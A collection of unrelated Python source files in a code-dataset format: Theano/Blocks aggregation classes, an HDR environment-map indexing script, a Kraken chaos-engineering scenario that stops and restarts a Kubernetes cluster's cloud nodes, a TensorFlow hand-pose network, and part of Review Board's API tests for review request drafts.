from theano.ifelse import ifelse
from blocks.utils import shared_like
logger = logging.getLogger(__name__)
@add_metaclass(ABCMeta)
class AggregationScheme(object):
"""How to incrementally evaluate a Theano variable over minibatches.
An AggregationScheme allocates :class:`Aggregator` that can
incrementally compute the value of a Theano variable on a full dataset
by aggregating partial results computed on multiple batches.
The AggregationScheme should be attached via the tag
``aggregation_scheme`` to a Theano variable which computes the desired
value on a single batch.
Parameters
----------
variable: :class:`~tensor.TensorVariable`
The variable that holds the desired value on a single batch.
"""
@abstractmethod
def get_aggregator(self):
"""Return a new Aggregator for this variable."""
pass
class Aggregator(object):
"""An Aggregator incrementally evaluates a Theano variable on a dataset.
.. warning::
The Aggregators should never be created directly. Instead use the
:meth:`AggregationScheme.get_aggregator` method.
Example usages are:
* compute the mean of some value over examples, sequence lengths etc.
* track a parameter of a model
* monitor a penalty
The Aggregator maintains a set of Theano sharer values called
accumulators and specifies how they should be initialized, and
updated with incremental calculations. Finally, it
provides a Theano variable that reads the accumulators
and computes the final value.
Parameters
----------
aggregation_scheme : :class:`AggregationScheme`
The aggregation scheme that constructed this Aggregator
initialization_updates : list of Theano updates
Updates that specify how to initialize shared variables of
this Aggregator. *Can only refer to shared variables and
constants.*
accumulation_updates : list of Theano updates
Updates that specify how a new batch of data gets processed
by this Aggregator. *Can refer to model inputs.*
readout_variable : :class:`~tensor.TensorVariable`
Theano variable that holds the final value based on accumulated
partial results. *readout_variable must only consist of shared
variables and constants.*
Attributes
----------
All constructor parameters are accessible as attributes.
"""
def __init__(self, aggregation_scheme, initialization_updates=None,
accumulation_updates=None, readout_variable=None):
self.aggregation_scheme = aggregation_scheme
self.readout_variable = readout_variable
if initialization_updates is None:
initialization_updates = []
if accumulation_updates is None:
accumulation_updates = []
self.initialization_updates = initialization_updates
self.accumulation_updates = accumulation_updates
class Mean(AggregationScheme):
"""Aggregation scheme which computes the mean.
Parameters
----------
numerator : :class:`~tensor.TensorVariable`
Theano variable for the numerator e.g. the likelihood
denominator : :class:`~tensor.TensorVariable`
Theano variable for the denominator e.g. the batch size
"""
def __init__(self, numerator, denominator):
self.numerator = numerator
self.denominator = denominator
def get_aggregator(self):
initialized = shared_like(0.)
numerator_acc = shared_like(self.numerator)
denominator_acc = shared_like(self.denominator)
conditional_update_num = ifelse(initialized,
self.numerator + numerator_acc,
self.numerator)
conditional_update_den = ifelse(initialized,
self.denominator + denominator_acc,
self.denominator)
initialization_updates = [(numerator_acc,
tensor.zeros_like(numerator_acc)),
(denominator_acc,
tensor.zeros_like(denominator_acc)),
(initialized, 0.)]
accumulation_updates = [(numerator_acc,
conditional_update_num),
(denominator_acc,
conditional_update_den),
(initialized, 1.)]
aggregator = Aggregator(aggregation_scheme=self,
initialization_updates=initialization_updates,
accumulation_updates=accumulation_updates,
readout_variable=(numerator_acc /
denominator_acc))
return aggregator
def mean(numerator, denominator=1.):
"""Mean of quantity (numerator) over a number (denominator) values."""
variable = numerator / denominator
variable.tag.aggregation_scheme = Mean(numerator, denominator)
variable.name = numerator.name
return variable
class _DataIndependent(AggregationScheme):
"""Dummy aggregation scheme for values that don't depend on data."""
def __init__(self, variable):
self.variable = variable
def get_aggregator(self):
return Aggregator(aggregation_scheme=self,
initialization_updates=[],
accumulation_updates=[],
readout_variable=self.variable)
class TakeLast(AggregationScheme):
"""Aggregation scheme which remembers only the last value."""
def __init__(self, variable):
self.variable = variable
def get_aggregator(self):
self.storage = shared_like(self.variable)
return Aggregator(aggregation_scheme=self,
initialization_updates=[
(self.storage, tensor.zeros_like(self.storage))],
accumulation_updates=[(self.storage, self.variable)],
readout_variable=self.storage)
@add_metaclass(ABCMeta)
class MonitoredQuantity(object):
"""The base class for monitored-quantities.
To monitor a non-Theano quantity in Blocks you have to implement this
interface for it. The initialize method initializes accumulators and
the parameters needed to compute this quantity, accumulate method
accumulates results for every batch, and finally readout is called
to get the accumulated results.
Attributes
----------
requires : list
List of Theano variables needed to calculate this quantity.
name : str
The name of monitored quantity which appears in the log.
See Also
--------
:class:`~blocks.monitoring.evaluators.DatasetEvaluator`
:class:`~blocks.extensions.DataStreamMonitoring`
"""
def __init__(self, requires=None, name=None):
if requires is None:
requires = []
self.requires = requires
self.name = name
@abstractmethod
def initialize(self):
"""Initialize accumulators for this monitored quantity."""
pass
@abstractmethod
def accumulate(self):
"""Accumulate results for every batch."""
pass
@abstractmethod
def readout(self):
"""Readout the accumulated results to capture the final result."""
pass
|
StarcoderdataPython
|
6625388
|
<gh_stars>0
#!/usr/bin/env python
# @license
# Copyright 2020 <NAME> - All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os, glob
import json
path = "./assets/env/"
files = {}
paths = glob.glob(path + "**/*.hdr", recursive=True)
paths.sort()
for f in paths:
n = os.path.splitext(os.path.basename(f))[0]
files[n] = f
data_str = json.dumps(files, indent=4)
data_str = data_str.replace('\\\\', '/')
print(data_str)
with open(path + 'ibl_index.js', 'w') as outfile:
outfile.write("var ibl_index = ");
outfile.write(data_str)
outfile.write(";\n\n")
outfile.write("export default ibl_index;\n")
|
StarcoderdataPython
|
12840413
|
#!/usr/bin/env python
import sys
import yaml
import logging
import time
from multiprocessing.pool import ThreadPool
import kraken.cerberus.setup as cerberus
import kraken.kubernetes.client as kubecli
import kraken.post_actions.actions as post_actions
from kraken.node_actions.aws_node_scenarios import AWS
from kraken.node_actions.openstack_node_scenarios import OPENSTACKCLOUD
from kraken.node_actions.az_node_scenarios import Azure
from kraken.node_actions.gcp_node_scenarios import GCP
def multiprocess_nodes(cloud_object_function, nodes):
try:
# pool object with number of element
pool = ThreadPool(processes=len(nodes))
logging.info("nodes type " + str(type(nodes[0])))
if type(nodes[0]) is tuple:
node_id = []
node_info = []
for node in nodes:
node_id.append(node[0])
node_info.append(node[1])
logging.info("node id " + str(node_id))
logging.info("node info" + str(node_info))
pool.starmap(cloud_object_function, zip(node_info, node_id))
else:
logging.info("pool type" + str(type(nodes)))
pool.map(cloud_object_function, nodes)
pool.close()
except Exception as e:
logging.info("Error on pool multiprocessing: " + str(e))
# Inject the cluster shut down scenario
def cluster_shut_down(shut_down_config):
runs = shut_down_config["runs"]
shut_down_duration = shut_down_config["shut_down_duration"]
cloud_type = shut_down_config["cloud_type"]
timeout = shut_down_config["timeout"]
if cloud_type.lower() == "aws":
cloud_object = AWS()
elif cloud_type.lower() == "gcp":
cloud_object = GCP()
elif cloud_type.lower() == "openstack":
cloud_object = OPENSTACKCLOUD()
elif cloud_type.lower() in ["azure", "az"]:
cloud_object = Azure()
else:
logging.error("Cloud type " + cloud_type + " is not currently supported for cluster shut down")
sys.exit(1)
nodes = kubecli.list_nodes()
node_id = []
for node in nodes:
instance_id = cloud_object.get_instance_id(node)
node_id.append(instance_id)
logging.info("node id list " + str(node_id))
for _ in range(runs):
logging.info("Starting cluster_shut_down scenario injection")
stopping_nodes = set(node_id)
multiprocess_nodes(cloud_object.stop_instances, node_id)
stopped_nodes = stopping_nodes.copy()
while len(stopping_nodes) > 0:
for node in stopping_nodes:
if type(node) is tuple:
node_status = cloud_object.wait_until_stopped(node[1], node[0], timeout)
else:
node_status = cloud_object.wait_until_stopped(node, timeout)
# Only want to remove node from stopping list when fully stopped/no error
if node_status:
stopped_nodes.remove(node)
stopping_nodes = stopped_nodes.copy()
logging.info("Shutting down the cluster for the specified duration: %s" % (shut_down_duration))
time.sleep(shut_down_duration)
logging.info("Restarting the nodes")
restarted_nodes = set(node_id)
multiprocess_nodes(cloud_object.start_instances, node_id)
logging.info("Wait for each node to be running again")
not_running_nodes = restarted_nodes.copy()
while len(not_running_nodes) > 0:
for node in not_running_nodes:
if type(node) is tuple:
node_status = cloud_object.wait_until_running(node[1], node[0], timeout)
else:
node_status = cloud_object.wait_until_running(node, timeout)
if node_status:
restarted_nodes.remove(node)
not_running_nodes = restarted_nodes.copy()
logging.info("Waiting for 150s to allow cluster component initialization")
time.sleep(150)
logging.info("Successfully injected cluster_shut_down scenario!")
def run(scenarios_list, config, wait_duration):
failed_post_scenarios = []
for shut_down_config in scenarios_list:
if len(shut_down_config) > 1:
pre_action_output = post_actions.run("", shut_down_config[1])
else:
pre_action_output = ""
with open(shut_down_config[0], "r") as f:
shut_down_config_yaml = yaml.full_load(f)
shut_down_config_scenario = shut_down_config_yaml["cluster_shut_down_scenario"]
start_time = int(time.time())
cluster_shut_down(shut_down_config_scenario)
logging.info("Waiting for the specified duration: %s" % (wait_duration))
time.sleep(wait_duration)
failed_post_scenarios = post_actions.check_recovery(
"", shut_down_config, failed_post_scenarios, pre_action_output
)
end_time = int(time.time())
cerberus.publish_kraken_status(config, failed_post_scenarios, start_time, end_time)
|
StarcoderdataPython
|
3421552
|
import numpy as np
import tensorflow as tf
from tensorflow.keras import Model
from tensorflow.keras.layers import BatchNormalization, Conv2D, Dense, Input, MaxPooling2D, ReLU, UpSampling2D
from src.utils.imaging import resize_bilinear_nearest_batch
class ResnetBlock(tf.keras.layers.Layer):
def __init__(self, kernel_size, filters):
super(ResnetBlock, self).__init__(name='')
self.kernel_size = kernel_size
self.filters = filters
half_filters = int(filters // 2)
self.conv2d_1 = conv(half_filters, (1, 1))
self.bn_1 = bn()
self.conv2d_2 = conv(half_filters, kernel_size, padding='same')
self.bn_2 = bn()
self.conv2d_3 = conv(filters, (1, 1))
self.bn_3 = bn()
self.conv2d_4 = conv(filters, (1, 1))
self.bn_4 = bn()
def get_config(self):
config = super().get_config().copy()
config.update({
'kernel_size': self.kernel_size,
'filters': self.filters,
})
return config
def call(self, input, training=False):
x = self.conv2d_1(input)
x = self.bn_1(x, training=training)
x = tf.nn.relu(x)
x = self.conv2d_2(x)
x = self.bn_2(x, training=training)
x = tf.nn.relu(x)
x = self.conv2d_3(x)
x = self.bn_3(x, training=training)
if input.shape[-1] != self.filters:
input = self.conv2d_4(input)
input = self.bn_4(input, training=training)
x += input
return tf.nn.relu(x)
def conv(filters, kernel_size, strides=(1, 1), padding='valid', use_bias=True):
initializer = tf.keras.initializers.TruncatedNormal(0.0, 0.01)
regularizer = tf.keras.regularizers.L1L2(l2=0.00005)
return Conv2D(filters, kernel_size, strides=strides, padding=padding, kernel_initializer=initializer,
kernel_regularizer=regularizer, use_bias=use_bias)
def bn():
initializer = tf.keras.initializers.TruncatedNormal(1.0, 0.01)
regularizer = tf.keras.regularizers.L1L2(l2=0.00005)
return BatchNormalization(gamma_initializer=initializer, gamma_regularizer=regularizer)
def conv_bn(x, filters, kernel_size, strides=(1, 1), padding='valid'):
x = conv(filters, kernel_size, strides=strides, padding=padding)(x)
x = bn()(x)
return x
def conv_bn_relu(x, filters, kernel_size, strides=(1, 1), padding='valid'):
x = conv(filters, kernel_size, strides=strides, padding=padding)(x)
x = bn()(x)
return ReLU()(x)
class JGR_J2O:
def __init__(self, input_size=96, n_joints=21, n_features=128):
self.input_size = input_size
self.out_size = input_size // 4
self.n_joints = n_joints
self.n_features = n_features
self.A_e = self.connection_weight_matrix()
def connection_weight_matrix(self):
# This is A + I (adjancency matrix + identity matrix):
A = np.array([[1, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0],
[1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1]])
D = np.diag(np.power(np.sum(A, axis=0), -0.5))
A_e = np.dot(np.dot(D, A), D)
A_e = tf.constant(A_e, dtype=tf.float32)
return A_e
def hourglass_module(self, inputs, n, features):
with tf.name_scope(name='hourglass'):
left = MaxPooling2D(pool_size=(2, 2), strides=(2, 2))(inputs)
left = ResnetBlock(kernel_size=(3, 3), filters=features)(left)
top = ResnetBlock(kernel_size=(3, 3), filters=features)(inputs)
if n > 1:
middle = self.hourglass_module(left, n - 1, features)
else:
middle = left
right = ResnetBlock(kernel_size=(3, 3), filters=features)(middle)
right = UpSampling2D(size=(2, 2), interpolation='nearest')(right)
return right + top
def joint_graph_reasoning_module(self, x):
w, F = self.pixel_to_joint_voting(x) # produces joints' features
Fe = self.graph_reasoning(F)
newFe = self.joint_to_pixel_mapping(Fe, w)
# local feature enhancement
x_ = tf.concat([newFe, x], axis=-1)
x_ = conv_bn_relu(x_, self.n_features, (1, 1))
return x_, w
def pixel_to_joint_voting(self, x):
weights = conv(self.n_joints, (1, 1))(x)
weights = self.spatial_softmax(weights) # [-1, N, W * H]
x = conv_bn_relu(x, x.shape[-1], (1, 1))
x = tf.reshape(x, [-1, x.shape[1] * x.shape[2], x.shape[3]]) # [-1, W * H, features (C)]
F = tf.matmul(weights, x)
w_reshaped = tf.reshape(weights, [-1, self.n_joints, self.out_size, self.out_size])
return w_reshaped, F
def graph_reasoning(self, F):
"""
Augments joints' feature representations
by computing the following matrix multiplication
F_e = σ(A_e @ F @ W_e), where
A_e is a connection weight matrix defining joint dependencies,
W_e is a trainable transformation matrix,
σ is a nonlinear function.
Parameters
----------
F
Joints' feature representations
Returns
----------
Returns augmented joints' feature representations
of the same shape as F.
"""
# Matrix multiplication through trainable matrix W_e
F_reshaped = tf.reshape(F, [-1, self.n_features])
FWe = Dense(F.shape[-1], use_bias=False)(F_reshaped)
FWe = tf.reshape(FWe, [-1, self.n_joints, self.n_features])
F_augmented = tf.matmul(self.A_e, FWe)
F_augmented = ReLU()(F_augmented)
return F_augmented
def joint_to_pixel_mapping(self, Fe, w):
"""
(-1, 21, 128) -> (-1, 24, 24, 128)
Parameters
----------
Fe
w
Returns
-------
"""
# (-1, 21, 128) -> (-1, 21, 1, 1, 128)
newFe = Fe[:, :, tf.newaxis, tf.newaxis, :]
# (-1, 21, 1, 1, 128) -> (-1, 21, 24, 24, 128)
newFe = tf.tile(newFe, [1, 1, self.out_size, self.out_size, 1])
# (-1, 21, 24, 24, 128) -> (-1, 24, 24, 128)
newFe = newFe * w[..., tf.newaxis] # (-1, 21, 24, 24, 128)
newFe = tf.reduce_mean(newFe, axis=1) # finally (-1, 24, 24, 128)
newFe = conv_bn_relu(newFe, self.n_features, kernel_size=(1, 1))
return newFe
def spatial_softmax(self, features):
"""
Computes the softmax function for four-dimensional array.
Parameters
----------
features
Features has a shape (batch_size, height, width, channels).
"""
_, H, W, C = features.shape
features = tf.reshape(features, [-1, H * W, C])
features = tf.transpose(features, [0, 2, 1])
# features = tf.reshape(tf.transpose(features, [0, 3, 1, 2]), [B * C, H * W])
softmax = tf.nn.softmax(features, axis=1)
# softmax = tf.reshape(softmax, [B, C, H, W])
# softmax = tf.transpose(tf.reshape(softmax, [B, C, H, W]), [0, 2, 3, 1])
return softmax
def pixel_to_offset_module(self, x):
u_offsets = conv(self.n_joints, kernel_size=(1, 1), strides=(1, 1), use_bias=False)(x)
v_offsets = conv(self.n_joints, kernel_size=(1, 1), strides=(1, 1), use_bias=False)(x)
z_offsets = conv(self.n_joints, kernel_size=(1, 1), strides=(1, 1), use_bias=False)(x)
return u_offsets, v_offsets, z_offsets
def graph(self):
input = Input(shape=(self.input_size, self.input_size, 1))
# The following layers precede the hourglass module
# according to Hourglass and JGR-P2O papers
x = conv_bn_relu(input, filters=32, kernel_size=(7, 7), strides=(2, 2), padding='same') # 48, 48, 32
x = ResnetBlock(kernel_size=(3, 3), filters=64)(x)
x = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), padding='same')(x)
x = ResnetBlock(kernel_size=(3, 3), filters=x.shape[-1])(x)
x = ResnetBlock(kernel_size=(3, 3), filters=self.n_features)(x) # 24, 24, hourglass_features
# The number of features stays the same across the whole hourglass module
x = self.hourglass_module(x, n=3, features=x.shape[-1])
x = ResnetBlock(kernel_size=(3, 3), filters=x.shape[-1])(x)
x_jgr, weights = self.joint_graph_reasoning_module(x)
u_offs, v_offs, z_offs = self.pixel_to_offset_module(x_jgr)
offsets = tf.stack([u_offs, v_offs, z_offs], axis=-1, name='offsets')
# offs.shape [-1, 24, 24, 21]
# u_im, v_im, z_im
weights = tf.transpose(weights, [0, 2, 3, 1]) # [-1, 24, 24, 21]
# u_im.shape [-1, 24, 24, 21]
x = tf.range(self.out_size)
y = tf.range(self.out_size)
x, y = tf.meshgrid(x, y)
# expand_dims, cast, and normalize to [0, 1]
u_im = tf.cast(x[:, :, tf.newaxis], tf.float32) / self.out_size
v_im = tf.cast(y[:, :, tf.newaxis], tf.float32) / self.out_size
# Z coordinate is retrieved from the image directly
# (values should be already normalized to [-1, 1]:
# z_im = tf.image.resize(input, [self.out_size, self.out_size],
# method=tf.image.ResizeMethod.BILINEAR)
z_im = resize_bilinear_nearest_batch(input, [self.out_size, self.out_size])
# u, v, z: [-1, 21]
u = tf.reduce_sum(weights * (u_im + u_offs), axis=[1, 2])
v = tf.reduce_sum(weights * (v_im + v_offs), axis=[1, 2])
z = tf.reduce_sum(weights * (z_im + z_offs), axis=[1, 2])
uvz = tf.stack([u, v, z], axis=-1, name='joints')
return Model(input, outputs=[uvz, offsets])
|
StarcoderdataPython
|
3231612
|
from __future__ import print_function, unicode_literals
from django.contrib import auth
from django.contrib.auth.models import Permission, User
from django.core import mail
from djblets.features.testing import override_feature_check
from djblets.testing.decorators import add_fixtures
from djblets.webapi.errors import INVALID_FORM_DATA, PERMISSION_DENIED
from djblets.webapi.testing.decorators import webapi_test_template
from kgb import SpyAgency
from reviewboard.accounts.backends import AuthBackend, StandardAuthBackend
from reviewboard.accounts.models import LocalSiteProfile
from reviewboard.changedescs.models import ChangeDescription
from reviewboard.diffviewer.features import dvcs_feature
from reviewboard.reviews.fields import (BaseEditableField,
BaseTextAreaField,
BaseReviewRequestField,
get_review_request_fieldset)
from reviewboard.reviews.models import ReviewRequest, ReviewRequestDraft
from reviewboard.reviews.signals import (review_request_published,
review_request_publishing)
from reviewboard.webapi.errors import (COMMIT_ID_ALREADY_EXISTS,
NOTHING_TO_PUBLISH,
PUBLISH_ERROR)
from reviewboard.webapi.resources import resources
from reviewboard.webapi.tests.base import BaseWebAPITestCase
from reviewboard.webapi.tests.mimetypes import \
review_request_draft_item_mimetype
from reviewboard.webapi.tests.mixins import BasicTestsMetaclass
from reviewboard.webapi.tests.mixins_extra_data import (ExtraDataItemMixin,
ExtraDataListMixin)
from reviewboard.webapi.tests.urls import get_review_request_draft_url
class ResourceTests(SpyAgency, ExtraDataListMixin, ExtraDataItemMixin,
BaseWebAPITestCase, metaclass=BasicTestsMetaclass):
"""Testing the ReviewRequestDraftResource API tests."""
fixtures = ['test_users']
sample_api_url = 'review-requests/<id>/draft/'
resource = resources.review_request_draft
def compare_item(self, item_rsp, draft):
changedesc = draft.changedesc
self.assertEqual(item_rsp['description'], draft.description)
self.assertEqual(item_rsp['testing_done'], draft.testing_done)
self.assertEqual(item_rsp['extra_data'],
self.resource.serialize_extra_data_field(draft))
self.assertEqual(item_rsp['changedescription'], changedesc.text)
if changedesc.rich_text:
self.assertEqual(item_rsp['changedescription_text_type'],
'markdown')
else:
self.assertEqual(item_rsp['changedescription_text_type'],
'plain')
if draft.description_rich_text:
self.assertEqual(item_rsp['description_text_type'], 'markdown')
else:
self.assertEqual(item_rsp['description_text_type'], 'plain')
if draft.testing_done_rich_text:
self.assertEqual(item_rsp['testing_done_text_type'], 'markdown')
else:
self.assertEqual(item_rsp['testing_done_text_type'], 'plain')
#
# HTTP DELETE tests
#
def setup_basic_delete_test(self, user, with_local_site, local_site_name):
review_request = self.create_review_request(
with_local_site=with_local_site,
submitter=user,
publish=True)
ReviewRequestDraft.create(review_request)
return (get_review_request_draft_url(review_request, local_site_name),
[review_request])
def check_delete_result(self, user, review_request):
self.assertIsNone(review_request.get_draft())
#
# HTTP GET tests
#
def setup_basic_get_test(self, user, with_local_site, local_site_name):
review_request = self.create_review_request(
with_local_site=with_local_site,
submitter=user,
publish=True)
draft = ReviewRequestDraft.create(review_request)
return (get_review_request_draft_url(review_request, local_site_name),
review_request_draft_item_mimetype,
draft)
def test_get_with_markdown_and_force_text_type_markdown(self):
"""Testing the GET review-requests/<id>/draft/ API
with *_text_type=markdown and ?force-text-type=markdown
"""
self._test_get_with_force_text_type(
text=r'\# `This` is a **test**',
rich_text=True,
force_text_type='markdown',
expected_text=r'\# `This` is a **test**')
def test_get_with_markdown_and_force_text_type_plain(self):
"""Testing the GET review-requests/<id>/draft/ API
with *_text_type=markdown and ?force-text-type=plain
"""
self._test_get_with_force_text_type(
text=r'\# `This` is a **test**',
rich_text=True,
force_text_type='plain',
expected_text='# `This` is a **test**')
def test_get_with_markdown_and_force_text_type_html(self):
"""Testing the GET review-requests/<id>/draft/ API
with *_text_type=markdown and ?force-text-type=html
"""
self._test_get_with_force_text_type(
text=r'\# `This` is a **test**',
rich_text=True,
force_text_type='html',
expected_text='<p># <code>This</code> is a '
'<strong>test</strong></p>')
def test_get_with_plain_and_force_text_type_markdown(self):
"""Testing the GET review-requests/<id>/draft/ API
with *_text_type=plain and ?force-text-type=markdown
"""
self._test_get_with_force_text_type(
text='#<`This` is a **test**>',
rich_text=False,
force_text_type='markdown',
expected_text=r'\#<\`This\` is a \*\*test\*\*>')
def test_get_with_plain_and_force_text_type_plain(self):
"""Testing the GET review-requests/<id>/draft/ API
with *_text_type=plain and ?force-text-type=plain
"""
self._test_get_with_force_text_type(
text='#<`This` is a **test**>',
rich_text=False,
force_text_type='plain',
expected_text='#<`This` is a **test**>')
def test_get_with_plain_and_force_text_type_html(self):
"""Testing the GET review-requests/<id>/draft/ API
with *_text_type=plain and ?force-text-type=html
"""
self._test_get_with_force_text_type(
text='#<`This` is a **test**>',
rich_text=False,
force_text_type='html',
expected_text='#<`This` is a **test**>')
def test_get_with_markdown_and_force_markdown_and_custom_markdown(self):
"""Testing the GET review-requests/<id>/draft/ API with rich text,
?force-text-type=raw,markdown, and custom field that supports markdown
"""
self._test_get_with_custom_and_force(
source_text=r'\# `This` is a **test**',
rich_text=True,
force_text_type='markdown',
expected_text=r'\# `This` is a **test**',
custom_field_supports_markdown=True)
def test_get_with_markdown_and_force_plain_and_custom_markdown(self):
"""Testing the GET review-requests/<id>/draft/ API with rich text,
?force-text-type=raw,plain, and custom field that supports markdown
"""
self._test_get_with_custom_and_force(
source_text=r'\# `This` is a **test**',
rich_text=True,
force_text_type='plain',
expected_text='# `This` is a **test**',
custom_field_supports_markdown=True)
def test_get_with_markdown_and_force_html_and_custom_markdown(self):
"""Testing the GET review-requests/<id>/draft/ API with rich text,
?force-text-type=raw,html, and custom field that supports markdown
"""
self._test_get_with_custom_and_force(
source_text=r'\# `This` is a **test**',
rich_text=True,
force_text_type='html',
expected_text='<p># <code>This</code> is a '
'<strong>test</strong></p>',
custom_field_supports_markdown=True)
def test_get_with_markdown_and_force_markdown_and_custom_nomarkdown(self):
"""Testing the GET review-requests/<id>/draft/ API with rich text,
?force-text-type=raw,markdown, and custom field that does not support
markdown
"""
self._test_get_with_custom_and_force(
source_text=r'\# `This` is a **test**',
rich_text=True,
force_text_type='markdown',
expected_text=r'\# `This` is a **test**',
custom_field_supports_markdown=False)
def test_get_with_markdown_and_force_plain_and_custom_nomarkdown(self):
"""Testing the GET review-requests/<id>/draft/ API with rich text,
?force-text-type=raw,plain, and custom field that does not support
markdown
"""
self._test_get_with_custom_and_force(
source_text=r'\# `This` is a **test**',
rich_text=True,
force_text_type='plain',
expected_text='# `This` is a **test**',
custom_field_supports_markdown=False)
def test_get_with_markdown_and_force_html_and_custom_nomarkdown(self):
"""Testing the GET review-requests/<id>/draft/ API with rich text,
?force-text-type=raw,html, and custom field that does not support
markdown
"""
self._test_get_with_custom_and_force(
source_text=r'\# `This` is a **test**',
rich_text=True,
force_text_type='html',
expected_text='<p># <code>This</code> is a '
'<strong>test</strong></p>',
custom_field_supports_markdown=False)
def test_get_with_plain_and_force_markdown_and_custom_nomarkdown(self):
"""Testing the GET review-requests/<id>/draft/ API with plain text,
?force-text-type=raw,markdown, and custom field that does not support
markdown
"""
self._test_get_with_custom_and_force(
source_text='#<`This` is a **test**>',
rich_text=False,
force_text_type='markdown',
expected_text=r'\#<\`This\` is a \*\*test\*\*>',
custom_field_supports_markdown=False)
def test_get_with_plain_and_force_plain_and_custom_nomarkdown(self):
"""Testing the GET review-requests/<id>/draft/ API with plain text,
?force-text-type=raw,markdown, and custom field that does not support
markdown
"""
self._test_get_with_custom_and_force(
source_text='#<`This` is a **test**>',
rich_text=False,
force_text_type='plain',
expected_text='#<`This` is a **test**>',
custom_field_supports_markdown=False)
def test_get_with_plain_and_force_html_and_custom_nomarkdown(self):
"""Testing the GET review-requests/<id>/draft/ API with plain text,
?force-text-type=raw,markdown, and custom field that does not support
markdown
"""
self._test_get_with_custom_and_force(
source_text='#<`This` is a **test**>',
rich_text=False,
force_text_type='html',
expected_text='#<`This` is a **test**>',
custom_field_supports_markdown=False)
#
# HTTP POST tests
#
def setup_basic_post_test(self, user, with_local_site, local_site_name,
post_valid_data):
review_request = self.create_review_request(
with_local_site=with_local_site,
submitter=user,
publish=True)
return (get_review_request_draft_url(review_request, local_site_name),
review_request_draft_item_mimetype,
{'description': 'New description'},
[review_request])
def check_post_result(self, user, rsp, review_request):
draft = review_request.get_draft()
self.assertIsNotNone(draft)
self.assertFalse(draft.rich_text)
self.compare_item(rsp['draft'], draft)
def test_post_with_publish_and_custom_field(self):
"""Testing the POST review-requests/<id>/draft/ API with custom
field set in same request and public=1
"""
class CustomField(BaseReviewRequestField):
can_record_change_entry = True
field_id = 'my-test'
fieldset = get_review_request_fieldset('info')
fieldset.add_field(CustomField)
try:
review_request = self.create_review_request(
submitter=self.user, publish=True, target_people=[self.user])
rsp = self.api_post(
get_review_request_draft_url(review_request),
{
'extra_data.my-test': 123,
'public': True
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
review_request = ReviewRequest.objects.get(pk=review_request.id)
self.assertIn('my-test', review_request.extra_data)
self.assertEqual(review_request.extra_data['my-test'], 123)
self.assertTrue(review_request.public)
finally:
fieldset.remove_field(CustomField)
def test_post_with_publish_and_custom_field_and_unbound_extra_data(self):
"""Testing the POST review-requests/<id>/draft/ API with custom
text field and extra_data unbound to a field set in same request and
public=1
"""
class CustomField(BaseTextAreaField):
field_id = 'my-test'
fieldset = get_review_request_fieldset('info')
fieldset.add_field(CustomField)
try:
review_request = self.create_review_request(
submitter=self.user, publish=True, target_people=[self.user])
rsp = self.api_post(
get_review_request_draft_url(review_request),
{
'extra_data.my-test': 'foo',
'extra_data.my-test_text_type': 'markdown',
'extra_data.unbound': 42,
'public': True
},
expected_mimetype=review_request_draft_item_mimetype)
self.assertEqual(rsp['stat'], 'ok')
# Confirm all the extra_data fields appear in the draft response.
draft_rsp = rsp['draft']
draft_extra_data = draft_rsp['extra_data']
self.assertIn('my-test', draft_extra_data)
self.assertEqual(draft_extra_data['my-test'], 'foo')
self.assertIn('unbound', draft_extra_data)
self.assertEqual(draft_extra_data['unbound'], 42)
self.assertIn('my-test_text_type', draft_extra_data)
self.assertEqual(draft_extra_data['my-test_text_type'], 'markdown')
# Further confirm only extra_data contents bound to a field were
